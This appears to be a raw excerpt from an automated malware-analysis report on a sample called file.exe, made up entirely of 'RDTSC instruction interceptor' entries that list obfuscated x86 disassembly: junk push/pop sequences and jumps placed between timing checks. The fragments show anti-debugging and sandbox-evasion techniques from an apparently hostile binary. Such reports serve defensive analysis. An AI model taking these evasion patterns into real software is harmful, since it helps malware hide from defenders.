Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB0742 second address: 4CB0793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov bx, cx 0x0000000d pushfd 0x0000000e jmp 00007FF248D534A0h 0x00000013 adc cx, 8488h 0x00000018 jmp 00007FF248D5349Bh 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007FF248D534A9h 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB0793 second address: 4CB0797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB0797 second address: 4CB079D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB079D second address: 4CB07B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF249520A31h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB07B2 second address: 4CB07B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB07B6 second address: 4CB0851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FF249520A33h 0x00000011 jmp 00007FF249520A33h 0x00000016 popfd 0x00000017 pushfd 0x00000018 jmp 00007FF249520A38h 0x0000001d and ah, 00000008h 0x00000020 jmp 00007FF249520A2Bh 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, ecx 0x00000028 jmp 00007FF249520A36h 0x0000002d push eax 0x0000002e pushad 0x0000002f movsx ebx, ax 0x00000032 pushfd 0x00000033 jmp 00007FF249520A2Ah 0x00000038 adc si, A398h 0x0000003d jmp 00007FF249520A2Bh 0x00000042 popfd 0x00000043 popad 0x00000044 xchg eax, ecx 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 mov edi, eax 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB0851 second address: 4CB0927 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007FF248D5349Ch 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e popad 0x0000000f mov eax, dword ptr [76FB65FCh] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FF248D5349Dh 0x0000001b sbb ecx, 76CDE3E6h 0x00000021 jmp 00007FF248D534A1h 0x00000026 popfd 0x00000027 mov si, CE17h 0x0000002b popad 0x0000002c test eax, eax 0x0000002e pushad 0x0000002f mov bx, si 0x00000032 jmp 00007FF248D534A4h 0x00000037 popad 0x00000038 je 00007FF2BAFD6549h 0x0000003e pushad 0x0000003f mov al, 6Ch 0x00000041 pushfd 0x00000042 jmp 00007FF248D534A3h 0x00000047 sbb ah, 0000007Eh 0x0000004a jmp 00007FF248D534A9h 0x0000004f popfd 0x00000050 popad 0x00000051 mov ecx, eax 0x00000053 pushad 0x00000054 pushfd 0x00000055 jmp 00007FF248D5349Ch 0x0000005a add esi, 24995778h 0x00000060 jmp 00007FF248D5349Bh 0x00000065 popfd 0x00000066 popad 0x00000067 xor eax, dword ptr [ebp+08h] 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007FF248D534A1h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB0927 second address: 4CB092D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB092D second address: 4CB0931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB0931 second address: 4CB0942 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and ecx, 1Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB0942 second address: 4CB0952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D5349Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB0952 second address: 4CB09EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b jmp 00007FF249520A36h 0x00000010 leave 0x00000011 jmp 00007FF249520A30h 0x00000016 retn 0004h 0x00000019 nop 0x0000001a mov esi, eax 0x0000001c lea eax, dword ptr [ebp-08h] 0x0000001f xor esi, dword ptr [00F32014h] 0x00000025 push eax 0x00000026 push eax 0x00000027 push eax 0x00000028 lea eax, dword ptr [ebp-10h] 0x0000002b push eax 0x0000002c call 00007FF24D2E12F3h 0x00000031 push FFFFFFFEh 0x00000033 jmp 00007FF249520A30h 0x00000038 pop eax 0x00000039 pushad 0x0000003a jmp 00007FF249520A2Dh 0x0000003f popad 0x00000040 ret 0x00000041 nop 0x00000042 push eax 0x00000043 call 00007FF24D2E130Fh 0x00000048 mov edi, edi 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d pushfd 0x0000004e jmp 00007FF249520A33h 0x00000053 adc cx, 896Eh 0x00000058 jmp 00007FF249520A39h 0x0000005d popfd 0x0000005e mov di, si 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB09EC second address: 4CB0A25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 16E456CEh 0x00000008 movsx ebx, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007FF248D5349Fh 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF248D534A5h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB0A25 second address: 4CB0A56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF249520A37h 0x00000009 jmp 00007FF249520A33h 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB0A56 second address: 4CB0A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 jmp 00007FF248D534A4h 0x0000000e pop ebp 0x0000000f pushad 0x00000010 mov ecx, 4277374Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60030 second address: 4C6006F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF249520A32h 0x00000008 adc ecx, 7AFFC808h 0x0000000e jmp 00007FF249520A2Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov ebx, ecx 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF249520A30h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6006F second address: 4C60085 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D5349Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60085 second address: 4C60089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60089 second address: 4C600A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D534A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C600A4 second address: 4C600AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C600AB second address: 4C600C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a pushad 0x0000000b movsx edx, cx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 mov edi, ecx 0x00000013 popad 0x00000014 and esp, FFFFFFF8h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C600C8 second address: 4C600CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C600CC second address: 4C600D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C600D0 second address: 4C600D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C600D6 second address: 4C600DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C600DC second address: 4C600F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C600F5 second address: 4C600FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C600FB second address: 4C60101 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60101 second address: 4C60105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60105 second address: 4C60109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60109 second address: 4C60118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60118 second address: 4C6011C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6011C second address: 4C60120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60120 second address: 4C60126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60126 second address: 4C6012C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6012C second address: 4C60130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60130 second address: 4C601E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007FF248D5349Fh 0x0000000e xchg eax, ebx 0x0000000f jmp 00007FF248D534A6h 0x00000014 push eax 0x00000015 jmp 00007FF248D5349Bh 0x0000001a xchg eax, ebx 0x0000001b jmp 00007FF248D534A6h 0x00000020 mov ebx, dword ptr [ebp+10h] 0x00000023 jmp 00007FF248D534A0h 0x00000028 xchg eax, esi 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FF248D5349Eh 0x00000030 or esi, 08C85638h 0x00000036 jmp 00007FF248D5349Bh 0x0000003b popfd 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007FF248D534A6h 0x00000043 adc cl, FFFFFF98h 0x00000046 jmp 00007FF248D5349Bh 0x0000004b popfd 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C601E1 second address: 4C6020F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 jmp 00007FF249520A30h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 call 00007FF249520A31h 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6020F second address: 4C60213 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60213 second address: 4C6023C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 pushad 0x00000009 mov esi, edx 0x0000000b mov ax, di 0x0000000e popad 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 jmp 00007FF249520A31h 0x00000017 xchg eax, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6023C second address: 4C60243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60243 second address: 4C60248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60248 second address: 4C602AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF248D5349Eh 0x0000000a and ecx, 74A726E8h 0x00000010 jmp 00007FF248D5349Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b push edi 0x0000001c mov bx, cx 0x0000001f pop esi 0x00000020 movsx ebx, si 0x00000023 popad 0x00000024 xchg eax, edi 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FF248D534A4h 0x0000002c jmp 00007FF248D534A5h 0x00000031 popfd 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C602AA second address: 4C6036B instructions: 0x00000000 rdtsc 0x00000002 movsx edx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b mov ebx, esi 0x0000000d jmp 00007FF249520A2Eh 0x00000012 popad 0x00000013 je 00007FF2BB7EED75h 0x00000019 jmp 00007FF249520A30h 0x0000001e cmp dword ptr [esi+08h], DDEEDDEEh 0x00000025 jmp 00007FF249520A30h 0x0000002a je 00007FF2BB7EED5Eh 0x00000030 pushad 0x00000031 call 00007FF249520A2Dh 0x00000036 call 00007FF249520A30h 0x0000003b pop eax 0x0000003c pop edi 0x0000003d popad 0x0000003e mov edx, dword ptr [esi+44h] 0x00000041 pushad 0x00000042 call 00007FF249520A2Ch 0x00000047 pushfd 0x00000048 jmp 00007FF249520A32h 0x0000004d adc ax, E528h 0x00000052 jmp 00007FF249520A2Bh 0x00000057 popfd 0x00000058 pop esi 0x00000059 mov dh, 21h 0x0000005b popad 0x0000005c or edx, dword ptr [ebp+0Ch] 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 call 00007FF249520A2Dh 0x00000067 pop esi 0x00000068 mov bx, 2434h 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6036B second address: 4C6038D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D5349Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF248D5349Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6038D second address: 4C6039C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6039C second address: 4C6040D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D534A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FF2BB021765h 0x0000000f jmp 00007FF248D5349Eh 0x00000014 test byte ptr [esi+48h], 00000001h 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FF248D5349Eh 0x0000001f sbb ecx, 2198CEA8h 0x00000025 jmp 00007FF248D5349Bh 0x0000002a popfd 0x0000002b call 00007FF248D534A8h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6040D second address: 4C60424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 jne 00007FF2BB7EECB4h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ebx, esi 0x00000011 mov esi, 19FA109Bh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60424 second address: 4C60458 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D534A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test bl, 00000007h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF248D534A8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60458 second address: 4C6045C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6045C second address: 4C60462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C507F6 second address: 4C5080B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5080B second address: 4C50842 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D534A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF248D5349Eh 0x0000000f push eax 0x00000010 jmp 00007FF248D5349Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50842 second address: 4C50848 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50848 second address: 4C50865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF248D534A9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50865 second address: 4C50885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov di, 6CFEh 0x0000000f mov ch, dh 0x00000011 popad 0x00000012 and esp, FFFFFFF8h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 movsx edi, si 0x0000001b mov si, BD6Bh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50885 second address: 4C5088B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5088B second address: 4C508D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF249520A2Bh 0x00000015 sub ax, 47BEh 0x0000001a jmp 00007FF249520A39h 0x0000001f popfd 0x00000020 push eax 0x00000021 pop edx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C508D6 second address: 4C508DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C508DC second address: 4C508E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C508E0 second address: 4C5095B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D5349Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF248D5349Fh 0x00000013 add eax, 30B5E27Eh 0x00000019 jmp 00007FF248D534A9h 0x0000001e popfd 0x0000001f push eax 0x00000020 mov bx, A492h 0x00000024 pop ebx 0x00000025 popad 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 jmp 00007FF248D534A4h 0x0000002d popad 0x0000002e push ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FF248D534A3h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5095B second address: 4C50973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF249520A34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50973 second address: 4C509A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b pushad 0x0000000c call 00007FF248D5349Dh 0x00000011 mov dh, ah 0x00000013 pop ebx 0x00000014 movzx ecx, di 0x00000017 popad 0x00000018 mov esi, dword ptr [ebp+08h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF248D534A0h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C509A8 second address: 4C50A3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub ebx, ebx 0x0000000a jmp 00007FF249520A2Fh 0x0000000f test esi, esi 0x00000011 pushad 0x00000012 mov bl, ch 0x00000014 jmp 00007FF249520A31h 0x00000019 popad 0x0000001a je 00007FF2BB7F63DCh 0x00000020 jmp 00007FF249520A2Eh 0x00000025 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FF249520A2Eh 0x00000033 or eax, 2DF413B8h 0x00000039 jmp 00007FF249520A2Bh 0x0000003e popfd 0x0000003f mov ah, 4Fh 0x00000041 popad 0x00000042 mov ecx, esi 0x00000044 jmp 00007FF249520A2Bh 0x00000049 je 00007FF2BB7F63A4h 0x0000004f pushad 0x00000050 mov di, si 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FF249520A2Eh 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50A3F second address: 4C50A6C instructions: 0x00000000 rdtsc 0x00000002 call 00007FF248D534A2h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b test byte ptr [76FB6968h], 00000002h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF248D5349Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50A6C second address: 4C50A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF249520A2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50A7E second address: 4C50A94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FF2BB028DC6h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov dx, si 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50A94 second address: 4C50A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50A99 second address: 4C50A9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50A9F second address: 4C50AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
